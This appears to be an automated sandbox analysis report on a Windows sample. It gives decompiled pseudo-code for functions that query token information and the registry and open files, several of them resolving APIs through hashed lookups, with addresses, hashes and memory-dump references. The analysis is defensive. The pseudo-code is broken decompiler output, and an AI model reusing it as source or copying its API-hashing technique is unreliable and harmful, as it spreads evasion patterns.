0x6f51112c
0x00000000
0x6f511131
0x6f5110f4
0x6f511107
0x6f511118
0x6f511118
0x6f51111a
0x6f511120
0x6f51113e
0x6f511145
0x6f51114e
0x6f51115c
0x6f511165
0x6f511168
0x6f51116a
0x00000000
0x00000000
0x00000000

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6F511118
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6F51117B

Memory Dump Source

Source File: 00000001.00000002.738911371.000000006F501000.00000020.00020000.sdmp, Offset: 6F500000, based on PE: true

Associated: 00000001.00000002.738884438.000000006F500000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739011384.000000006F51A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739077298.000000006F51D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.739123881.000000006F51F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: d1c2dcb2a1f8ff365f9feba055c13003afed043bcda7b31fb4d269ac4384018e
Instruction ID: fff1872cb04cc3fe9dc99c0c4cd4ab92c3fa3ad76015bfdf720678334d051cc9
Opcode Fuzzy Hash: d1c2dcb2a1f8ff365f9feba055c13003afed043bcda7b31fb4d269ac4384018e
Instruction Fuzzy Hash: EB41F37068C3426BFB15D56A9850BEF76ED9BA1700F1088B9B960CA1D0DB64FC45C751

Uniqueness

Uniqueness Score: -1.00%

Function 6F5157B4, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E6F5157B4(void* __ecx, char* _a4, intOrPtr _a8) {
				int _v16;
				int _v20;
				intOrPtr _t11;
				int* _t12;
				int _t13;
				void* _t23;
				char* _t35;
				int* _t38;

				_push(_t34);
				_t23 = __ecx;
				_t11 =  *((intOrPtr*)(__ecx + 4));
				if(_t11 == 0 || _t11 == 0xffffffff) {
					_t12 = 1;
				} else {
					_t12 = 0;
				}
				if(_t12 != 0) {
					L10:
					_t13 = 0;
				} else {
					_t35 = _a4;
					if(_t35 == 0 ||  *_t35 != 0) {
						_v20 = 0;
						_v16 = 0;
						if(E6F513064(0x150c05fc, 0x545b7fe2) != 0) {
							RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, 0,  &_v16); // executed
						}
						_t15 = _v16;
						if(_v16 != 0) {
							E6F50F828(_a8, _t15);
							if(E6F513064(0x150c05fc, 0x545b7fe2) != 0) {
								RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, E6F50F4BC(_a8, 0),  &_v20); // executed
							}
							_t13 = _v20;
						} else {
							goto L10;
						}
					} else {
						goto L10;
					}
				}
				return _t13;
			}

0x6f5157b8
0x6f5157b9
0x6f5157bb
0x6f5157c0
0x6f5157c7
0x6f5157cb
0x6f5157cb
0x6f5157cb
0x6f5157cf
0x6f515815
0x6f515815
0x6f5157d1
0x6f5157d1
0x6f5157d7
0x6f5157e0
0x6f5157e3
0x6f5157fa
0x6f51580b
0x6f51580b
0x6f51580d
0x6f515813
0x6f51581e
0x6f515836
0x6f515856
0x6f515856
0x6f515858
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6f5157d7
0x6f515860

APIs

RegQueryValueExA.KERNELBASE(?,6F51D1F8,00000000,?,00000000,00000000,?,?,?,6F51D1F8,?,6F515887,?,00000000,00000000), ref: 6F51580B
RegQueryValueExA.KERNELBASE(?,6F51D1F8,00000000,?,00000000,00000000,00000000,00000000,?,?,?,6F51D1F8,?,6F515887,?,00000000), ref: 6F515856

Memory Dump Source

Source File: 00000001.00000002.738911371.000000006F501000.00000020.00020000.sdmp, Offset: 6F500000, based on PE: true

Associated: 00000001.00000002.738884438.000000006F500000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739011384.000000006F51A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739077298.000000006F51D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.739123881.000000006F51F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1efe9e4701dbfa3cada60aee337f192807569c167ced025668ece5e7b2494b7e
Instruction ID: b5f8300e6104e8feb34ef03f28279aedbd04a234bc9c65202a96c356ed0146ae
Opcode Fuzzy Hash: 1efe9e4701dbfa3cada60aee337f192807569c167ced025668ece5e7b2494b7e
Instruction Fuzzy Hash: 2911AF7020D305BBE610DA299C90EABBBD8DF46754F11893EB49497181EB31FC00CB71

Uniqueness

Uniqueness Score: -1.00%

Function 6F515B3C, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E6F515B3C(WCHAR** __ecx, void* __edx, intOrPtr _a4, long _a8, long _a12) {
				char _v24;
				void* __esi;
				void* _t16;
				void* _t30;
				long _t37;
				void* _t38;
				long _t39;
				WCHAR** _t40;
				intOrPtr* _t55;
				WCHAR** _t56;
				char* _t59;
				long _t60;

				_t56 = __ecx;
				_t37 = _a8;
				if(E6F50D1CC(__ecx, 0x2f) != 0) {
					_t58 = _t60;
					E6F50D6D0(__ecx, _t60);
					E6F50CFF8(_t56,  *_t60);
					E6F50CFDC(_t60);
				}
				if(_t37 == 0) {
					_t64 = _a4 - 1;
					if(_a4 != 1) {
						__eflags = _a4 - 4;
						_t37 = (0 | _a4 == 0x00000004) + 2;
						__eflags = _t37;
					} else {
						_t37 = 1;
					}
				}
				E6F5162B0(_t64);
				if(_a4 > 5) {
					_t58 = 0;
					if(_t37 != 2) {
						_t16 = 3;
						__eflags = _t37 - 1;
						_t38 = 0;
						_t39 =  ==  ? _t16 : _t38;
					} else {
						_t39 = 1;
					}
					if(E6F513064(0x8e844d1e, 0x458d3b35) == 0) {
						_push(0);
					} else {
						_t30 = CreateFileW( *_t56, 0, _t39, 0, _t58, _a12, 0); // executed
						_push(_t30);
					}
					_t40 =  &(_t56[3]);
					E6F50C26C(_t40);
					if(E6F50C280(_t40) != 0) {
						_t56[2] = E6F5135F0(0);
						return 0;
					} else {
						if(_a4 == 2) {
							_t55 = E6F513064(0x8e844d1e, 0xba53868);
							__eflags = _t55;
							if(_t55 != 0) {
								 *_t55( *_t40, 0, 0, 2);
							}
						}
						_t59 =  &_v24;
						E6F513698(_t59, 0xff, 8);
						if(E6F513064(0x8e844d1e, 0xc5e2981f) != 0) {
							_push(_t59);
							_push(_t59);
							_push(0);
							_push( *_t40);
							asm("int3");
							asm("int3");
						}
						return 1;
					}
				} else {
					goto __eax;
				}
			}

0x6f515b43
0x6f515b45
0x6f515b52
0x6f515b56
0x6f515b5a
0x6f515b64
0x6f515b6b
0x6f515b6b
0x6f515b72
0x6f515b74
0x6f515b79
0x6f515b82
0x6f515b8a
0x6f515b8a
0x6f515b7b
0x6f515b7d
0x6f515b7d
0x6f515b79
0x6f515b8f
0x6f515b9b
0x6f515ccc
0x6f515c09
0x6f515c12
0x6f515c13
0x6f515c18
0x6f515c19
0x6f515c0b
0x6f515c0d
0x6f515c0d
0x6f515c2f
0x6f515c43
0x6f515c31
0x6f515c3e
0x6f515c40
0x6f515c40
0x6f515c45
0x6f515c4a
0x6f515c58
0x6f515cc3
0x00000000
0x6f515c5a
0x6f515c5f
0x6f515cac
0x6f515cae
0x6f515cb0
0x6f515cba
0x6f515cba
0x6f515cb0
0x6f515c61
0x6f515c6d
0x6f515c86
0x6f515c88
0x6f515c89
0x6f515c8a
0x6f515c8c
0x6f515c8e
0x6f515c8f
0x6f515c8f
0x00000000
0x6f515c92
0x6f515ba1
0x6f515bb1
0x6f515bb1

Memory Dump Source

Source File: 00000001.00000002.738911371.000000006F501000.00000020.00020000.sdmp, Offset: 6F500000, based on PE: true

Associated: 00000001.00000002.738884438.000000006F500000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739011384.000000006F51A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739077298.000000006F51D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.739123881.000000006F51F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 013bc1ea6267d9480f4cf395ddd74272f8d7181c33d4470477780e5b9d307583
Instruction ID: 6514e18fce3035380b5343fa295b5d06f6cdc28df81d26f6e451466293436811
Opcode Fuzzy Hash: 013bc1ea6267d9480f4cf395ddd74272f8d7181c33d4470477780e5b9d307583
Instruction Fuzzy Hash: BC31C17524C309BFFA10EA794E95B2B769ADFC164CF004939F9429A281DF31BD18C261

Uniqueness

Uniqueness Score: -1.00%

Function 015826AA, Relevance: 1.6, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 37%

			_entry_(void* __eflags, intOrPtr _a4) {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				int _v36;
				long _v40;
				intOrPtr _v44;
				long _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr _t32;
				int _t40;
				intOrPtr _t46;
				long _t53;
				long _t55;
				intOrPtr* _t56;

				_t57 = __eflags;
				_t27 = _a4;
				 *_t56 = _t27;
				_v20 = _t27;
				_v24 = E01581ED2(__eflags);
				_t29 = E0158180B(_t57);
				_v28 = _t29;
				if(_t29 != 0) {
					 *_t56 = _v28;
					_t46 =  *((intOrPtr*)(_v20 + 0x40))();
					_t56 = _t56 - 4;
					_v32 = _t46;
				}
				 *_t56 = _v20;
				_t31 = E0158200F();
				 *_t56 = _v20;
				_v52 = _t31;
				_t32 = E01581000(); // executed
				_t53 =  *((intOrPtr*)(_v20 + 0x28));
				_t55 =  *((intOrPtr*)(_t53 + 0x3c));
				_t54 = _t55;
				_t47 = _t53;
				_v56 = _t32;
				_v44 = _t53;
				_v40 = _t55;
				_v48 = _t53;
				if(_t55 != 0) {
					_v48 = _v44 + (_v40 + 0x0000ffff & 0x0000ffff) + 1;
				}
				if( *((short*)(_v48 + 0x5c)) != 3) {
					_t40 = FreeConsole(); // executed
					_v36 = _t40;
				}
				 *_t56 = _v20;
				E015816D7();
				 *_t56 = _v20; // executed
				E01582092(_t47, _t54, _t55); // executed
				return 0;
			}

0x015826aa
0x015826b3
0x015826b6
0x015826b9
0x015826c1
0x015826c4
0x015826cc
0x015826cf
0x015826d4
0x015826da
0x015826dd
0x015826e0
0x015826e0
0x0158270e
0x01582711
0x01582719
0x0158271c
0x0158271f
0x01582727
0x0158272a
0x0158272d
0x01582734
0x01582736
0x01582739
0x0158273c
0x0158273f
0x01582742
0x01582706
0x01582706
0x0158276e
0x015826ea
0x015826ec
0x015826ec
0x01582749
0x0158274c
0x01582754
0x01582757
0x01582765

APIs

FreeConsole.KERNELBASE ref: 015826EA

Memory Dump Source

Source File: 00000001.00000002.738035827.0000000001580000.00000040.00000001.sdmp, Offset: 01580000, based on PE: true

Similarity

API ID: ConsoleFree
String ID:
API String ID: 771614528-0
Opcode ID: 38b6a0e0edb67fc7f3afdc1df6e4a845eccec60550d0ef7e4b2e219df4fe64fc
Instruction ID: 3e4ffa93f7ce58ce1eeab247b8dd57a9ddac68b25f5f909ad003ad643a9eb358
Opcode Fuzzy Hash: 38b6a0e0edb67fc7f3afdc1df6e4a845eccec60550d0ef7e4b2e219df4fe64fc
Instruction Fuzzy Hash: CC21BDB5D0461A8FCB00FFAAC8849AEBBF1BF48354F144829D555AB340E7399981CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6F511166, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F511166(intOrPtr* __eax, void* __ebx, void* __ecx) {
				void* _t20;

				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(_t20 + 0x50182444)) =  *((intOrPtr*)(_t20 + 0x50182444)) + __ecx;
			}

0x6f511168
0x6f51116a

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6F51117B

Memory Dump Source

Source File: 00000001.00000002.738911371.000000006F501000.00000020.00020000.sdmp, Offset: 6F500000, based on PE: true

Associated: 00000001.00000002.738884438.000000006F500000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739011384.000000006F51A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739077298.000000006F51D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.739123881.000000006F51F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 4e60499eb3937ce800b1e92059161a74b54ecbb4c80258928a3e6af30130b065
Instruction ID: 233dc95bb7cfafa2e48421408955b6993062a981a0eed668da63be7f89b7aa91
Opcode Fuzzy Hash: 4e60499eb3937ce800b1e92059161a74b54ecbb4c80258928a3e6af30130b065
Instruction Fuzzy Hash: A4110A7050C7825BFF16D56A9850BEF7A9C9FA2700F1048F7E870DA4E4CA24FC81C662

Uniqueness

Uniqueness Score: -1.00%

Function 6F515BE5, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E6F515BE5(void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t21;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t32;
				WCHAR** _t33;
				long _t37;
				void* _t39;
				void* _t40;

				_t33 = __edi;
				if(__edx != 0) {
					_t37 = 3;
					if(_t21 != 2) {
						_t7 = 3;
						_t22 = 0;
						_t23 =  ==  ? _t7 : _t22;
					} else {
						_t23 = 1;
					}
					if(E6F513064(0x8e844d1e, 0x458d3b35) == 0) {
						_push(0);
					} else {
						_t20 = CreateFileW( *_t33, 0x80000000, _t23, 0, _t37, _a44, 0); // executed
						_push(_t20);
					}
					_t24 =  &(_t33[3]);
					E6F50C26C(_t24);
					if(E6F50C280(_t24) != 0) {
						_t33[2] = E6F5135F0(0x80000000);
						_t12 = 0;
					} else {
						if( *((intOrPtr*)(_t40 + 0x24)) == 2) {
							_t32 = E6F513064(0x8e844d1e, 0xba53868);
							if(_t32 != 0) {
								 *_t32( *_t24, 0, 0, 2);
							}
						}
						_t39 = _t40 + 8;
						E6F513698(_t39, 0xff, 8);
						_t40 = _t40 + 0xc;
						if(E6F513064(0x8e844d1e, 0xc5e2981f) != 0) {
							_push(_t39);
							_push(_t39);
							_push(0);
							_push( *_t24);
							asm("int3");
							asm("int3");
						}
						_t12 = 1;
					}
				} else {
					__edi[2] = 2;
					_t12 = 0;
				}
				return _t12;
			}

0x6f515be5
0x6f515be7
0x6f515bfe
0x6f515c09
0x6f515c12
0x6f515c18
0x6f515c19
0x6f515c0b
0x6f515c0d
0x6f515c0d
0x6f515c2f
0x6f515c43
0x6f515c31
0x6f515c3e
0x6f515c40
0x6f515c40
0x6f515c45
0x6f515c4a
0x6f515c58
0x6f515cc3
0x6f515cc6
0x6f515c5a
0x6f515c5f
0x6f515cac
0x6f515cb0
0x6f515cba
0x6f515cba
0x6f515cb0
0x6f515c61
0x6f515c6d
0x6f515c72
0x6f515c86
0x6f515c88
0x6f515c89
0x6f515c8a
0x6f515c8c
0x6f515c8e
0x6f515c8f
0x6f515c8f
0x6f515c92
0x6f515c92
0x6f515be9
0x6f515be9
0x6f515bf0
0x6f515bf0
0x6f515c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6F515C3E

Memory Dump Source

Source File: 00000001.00000002.738911371.000000006F501000.00000020.00020000.sdmp, Offset: 6F500000, based on PE: true

Associated: 00000001.00000002.738884438.000000006F500000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739011384.000000006F51A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739077298.000000006F51D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.739123881.000000006F51F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c46e35028ef516b2a6bafbb4d93dcee3a2ebb779e0ca04dcf25d6f0dd780b036
Instruction ID: 64ffc7f5c7511ca9a8c48233a3f7c76c0337ceedaae0945e3eb55ea0bcf9cb26
Opcode Fuzzy Hash: c46e35028ef516b2a6bafbb4d93dcee3a2ebb779e0ca04dcf25d6f0dd780b036
Instruction Fuzzy Hash: B701D67628C306BBF611EE784D85F6B7789DF8275CF104835B90165585DB327C58C261

Uniqueness

Uniqueness Score: -1.00%

Function 6F515BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E6F515BBD(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				void* _t31;
				intOrPtr* _t33;
				WCHAR** _t34;
				void* _t38;
				long _t39;
				void* _t41;
				void* _t42;

				_t34 = __edi;
				_t31 = 5;
				_t38 = 2;
				_t39 =  !=  ? _t31 : _t38;
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6F513064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t39, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6F50C26C(_t24);
				if(E6F50C280(_t24) != 0) {
					_t34[2] = E6F5135F0(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t42 + 0x24)) == 2) {
						_t33 = E6F513064(0x8e844d1e, 0xba53868);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t41 = _t42 + 8;
					E6F513698(_t41, 0xff, 8);
					_t42 = _t42 + 0xc;
					if(E6F513064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t41);
						_push(_t41);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x6f515bbd
0x6f515bc1
0x6f515bc4
0x6f515bc7
0x6f515c09
0x6f515c12
0x6f515c18
0x6f515c19
0x6f515c0b
0x6f515c0d
0x6f515c0d
0x6f515c2f
0x6f515c43
0x6f515c31
0x6f515c3e
0x6f515c40
0x6f515c40
0x6f515c45
0x6f515c4a
0x6f515c58
0x6f515cc3
0x6f515cc6
0x6f515c5a
0x6f515c5f
0x6f515cac
0x6f515cb0
0x6f515cba
0x6f515cba
0x6f515cb0
0x6f515c61
0x6f515c6d
0x6f515c72
0x6f515c86
0x6f515c88
0x6f515c89
0x6f515c8a
0x6f515c8c
0x6f515c8e
0x6f515c8f
0x6f515c8f
0x6f515c92
0x6f515c92
0x6f515c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6F515C3E

Memory Dump Source

Source File: 00000001.00000002.738911371.000000006F501000.00000020.00020000.sdmp, Offset: 6F500000, based on PE: true

Associated: 00000001.00000002.738884438.000000006F500000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739011384.000000006F51A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739077298.000000006F51D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.739123881.000000006F51F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a124f905a7b88adf81c00bd5bc08d6d83bbaf871b5730aa4a2b761ba493ce728
Instruction ID: bdb4e525103e803db853351ca6ac21e7ed8784cc91fc85d53591b08a55bdd57a
Opcode Fuzzy Hash: a124f905a7b88adf81c00bd5bc08d6d83bbaf871b5730aa4a2b761ba493ce728
Instruction Fuzzy Hash: BB01D23638830ABBFA10EA684D45F7B7789DFC279CF018836BA0165185EB227C59C121

Uniqueness

Uniqueness Score: -1.00%

Function 6F515BD1, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E6F515BD1(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t33;
				WCHAR** _t34;
				long _t38;
				void* _t40;
				void* _t41;

				_t34 = __edi;
				_t38 = 2;
				asm("adc ebp, 0x0");
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6F513064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t38, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6F50C26C(_t24);
				if(E6F50C280(_t24) != 0) {
					_t34[2] = E6F5135F0(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t41 + 0x24)) == 2) {
						_t33 = E6F513064(0x8e844d1e, 0xba53868);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t40 = _t41 + 8;
					E6F513698(_t40, 0xff, 8);
					_t41 = _t41 + 0xc;
					if(E6F513064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t40);
						_push(_t40);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x6f515bd1
0x6f515bd8
0x6f515bdb
0x6f515c09
0x6f515c12
0x6f515c18
0x6f515c19
0x6f515c0b
0x6f515c0d
0x6f515c0d
0x6f515c2f
0x6f515c43
0x6f515c31
0x6f515c3e
0x6f515c40
0x6f515c40
0x6f515c45
0x6f515c4a
0x6f515c58
0x6f515cc3
0x6f515cc6
0x6f515c5a
0x6f515c5f
0x6f515cac
0x6f515cb0
0x6f515cba
0x6f515cba
0x6f515cb0
0x6f515c61
0x6f515c6d
0x6f515c72
0x6f515c86
0x6f515c88
0x6f515c89
0x6f515c8a
0x6f515c8c
0x6f515c8e
0x6f515c8f
0x6f515c8f
0x6f515c92
0x6f515c92
0x6f515c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6F515C3E

Memory Dump Source

Source File: 00000001.00000002.738911371.000000006F501000.00000020.00020000.sdmp, Offset: 6F500000, based on PE: true

Associated: 00000001.00000002.738884438.000000006F500000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739011384.000000006F51A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739077298.000000006F51D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.739123881.000000006F51F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ab2bd4055e11c9f9a2bf07316868f5c1c5b37ceb7e280a100dd82f754eff5fb8
Instruction ID: 299f4b37714033484f635f47fc042cf359b50fe72e9b5a8a45db494414674456
Opcode Fuzzy Hash: ab2bd4055e11c9f9a2bf07316868f5c1c5b37ceb7e280a100dd82f754eff5fb8
Instruction Fuzzy Hash: 0A01F53628830ABBF710EA794D85F7B7689DFC225CF004836BA01A5185EF327C58C121

Uniqueness

Uniqueness Score: -1.00%

Function 6F515BB3, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6F515BB3(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6F513064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0x100, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6F50C26C(_t23);
				if(E6F50C280(_t23) != 0) {
					_t31[2] = E6F5135F0(0x100);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6F513064(0x8e844d1e, 0xba53868);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6F513698(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6F513064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x6f515bb3
0x6f515bba
0x6f515c09
0x6f515c12
0x6f515c18
0x6f515c19
0x6f515c0b
0x6f515c0d
0x6f515c0d
0x6f515c2f
0x6f515c43
0x6f515c31
0x6f515c3e
0x6f515c40
0x6f515c40
0x6f515c45
0x6f515c4a
0x6f515c58
0x6f515cc3
0x6f515cc6
0x6f515c5a
0x6f515c5f
0x6f515cac
0x6f515cb0
0x6f515cba
0x6f515cba
0x6f515cb0
0x6f515c61
0x6f515c6d
0x6f515c72
0x6f515c86
0x6f515c88
0x6f515c89
0x6f515c8a
0x6f515c8c
0x6f515c8e
0x6f515c8f
0x6f515c8f
0x6f515c92
0x6f515c92
0x6f515c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6F515C3E

Memory Dump Source

Source File: 00000001.00000002.738911371.000000006F501000.00000020.00020000.sdmp, Offset: 6F500000, based on PE: true

Associated: 00000001.00000002.738884438.000000006F500000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739011384.000000006F51A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739077298.000000006F51D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.739123881.000000006F51F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 48822c07a41f11b243a306607094b00b4c7456231264d7b8e6290cc97b67c54b
Instruction ID: 3214e3bb6dacf51b10c0beb7d09ce1ac73bcc3c0bbeff38403a216fc152c845f
Opcode Fuzzy Hash: 48822c07a41f11b243a306607094b00b4c7456231264d7b8e6290cc97b67c54b
Instruction Fuzzy Hash: 3601D43628830ABBFA11EA784D45F7B7689DF8275CF104836BA4165585DF327D58C121

Uniqueness

Uniqueness Score: -1.00%

Function 6F515C01, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6F515C01(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6F513064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6F50C26C(_t23);
				if(E6F50C280(_t23) != 0) {
					_t31[2] = E6F5135F0(0);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6F513064(0x8e844d1e, 0xba53868);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6F513698(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6F513064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x6f515c01
0x6f515c05
0x6f515c09
0x6f515c12
0x6f515c18
0x6f515c19
0x6f515c0b
0x6f515c0d
0x6f515c0d
0x6f515c2f
0x6f515c43
0x6f515c31
0x6f515c3e
0x6f515c40
0x6f515c40
0x6f515c45
0x6f515c4a
0x6f515c58
0x6f515cc3
0x6f515cc6
0x6f515c5a
0x6f515c5f
0x6f515cac
0x6f515cb0
0x6f515cba
0x6f515cba
0x6f515cb0
0x6f515c61
0x6f515c6d
0x6f515c72
0x6f515c86
0x6f515c88
0x6f515c89
0x6f515c8a
0x6f515c8c
0x6f515c8e
0x6f515c8f
0x6f515c8f
0x6f515c92
0x6f515c92
0x6f515c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6F515C3E

Memory Dump Source

Source File: 00000001.00000002.738911371.000000006F501000.00000020.00020000.sdmp, Offset: 6F500000, based on PE: true

Associated: 00000001.00000002.738884438.000000006F500000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739011384.000000006F51A000.00000002.00020000.sdmp Download File
